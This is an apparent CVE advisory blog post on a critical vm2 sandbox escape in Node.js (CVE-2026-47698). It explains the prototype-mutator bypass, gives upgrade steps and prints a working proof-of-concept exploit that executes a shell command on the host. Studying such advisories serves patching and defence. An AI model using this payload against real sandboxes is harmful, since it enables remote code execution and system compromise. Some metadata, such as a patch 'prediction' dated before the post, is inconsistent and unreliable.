VM2 Sandbox Breakout Using Dangerous Host Proto Mutators, Sandbox Escape, CVE-2026-47698 (Critical) -DC-Aug2026-1551

Listen to this Post

VM2 is an open source VM/sandbox for Node.js. Prior to version 3.11.6, `lib/bridge.js` and `lib/setup-sandbox.js` fail to block stacked indirection through `Function.prototype.call` around dangerous host prototype getter and setter mutators. The vulnerability stems from an insufficient fix for GHSA-v6mx-mf47-r5wg (CVE-2026-47131), which can be bypassed.
The sandbox breakout works by leveraging `Buffer.call.call({}.__lookupGetter__, Buffer, “__proto__”)` to obtain the host’s prototype getter, and `Buffer.call.call({}.__lookupSetter__, Buffer, “__proto__”)` to obtain the host’s prototype setter. The original fix for GHSA-v6mx-mf47-r5wg attempted to block dangerous calls by treating `indirectcall.call(dangerousmutator, …)` as dangerous. However, this fix can be bypassed by replacing it with `indirectcall.call(indirectcall, dangerousmutator, …)` since indirect calls are not seen as dangerous.
When sandbox code triggers an error—such as by calling await WebAssembly.compileStreaming()—the error object’s prototype chain can be manipulated. By using the getter to obtain `e.__proto__` and the setter to set it to null, the sandbox code severs the host intrinsic’s prototype chain. This allows the attacker to reach e.constructor.constructor, which is the host’s `Function` constructor. With the host `Function` constructor, the attacker can execute `return process` to obtain the host `process` object, then call `mainModule.require(‘child_process’).execSync()` to execute arbitrary commands on the host system. The vulnerability is classified under CWE-913 (Improper Control of Dynamically-Managed Code Resources) with a CVSS base score of 9.8 (CRITICAL).

DailyCVE Form:

Platform: Node.js / vm2
Version: < 3.11.6
Vulnerability: Sandbox Escape RCE
Severity: Critical (CVSS 9.8)
Date: 2026-08-17

Prediction: Patch expected 2026-08-14 (v3.11.6 released)

What Undercode Say:

Analytics showing vulnerability metrics:

Check installed vm2 version
npm list vm2
CVSS Score: 9.8 (CRITICAL)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected versions: < 3.11.6
Fixed version: 3.11.6
CWE: 913 - Improper Control of Dynamically-Managed Code Resources
EPSS Score: High confidence (0.9655)

Exploit: (Educational Purposes!)

Proof of Concept demonstrating the sandbox breakout:

const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(<code>const getProto = Buffer.call.call(Buffer.call, {}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call(Buffer.call, {}.__lookupSetter__, Buffer, "__proto__");
async function f() {
try {
await WebAssembly.compileStreaming();
} catch(e) {
Buffer.call.call(Buffer.call, setProto, Buffer.call.call(Buffer.call, getProto, e), null);
}
try {
await WebAssembly.compileStreaming();
} catch(e) {
e.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
}
f();
`));

Protection:

Upgrade to vm2 version 3.11.6 or later immediately. Run `npm install [email protected] to apply the patch. If immediate upgrade is not possible, avoid executing untrusted code within vm2 sandboxes and consider alternative sandboxing solutions. Additional security controls such as network segmentation, process monitoring, and running Node.js processes with minimal privileges can help mitigate potential impact.

Impact:

Attackers can perform Remote Code Execution (RCE) under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox. Successful exploitation allows attackers to escape the sandbox and execute arbitrary commands on the host system with the privileges of the running Node.js process, potentially leading to full system compromise, data exfiltration, and persistent access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top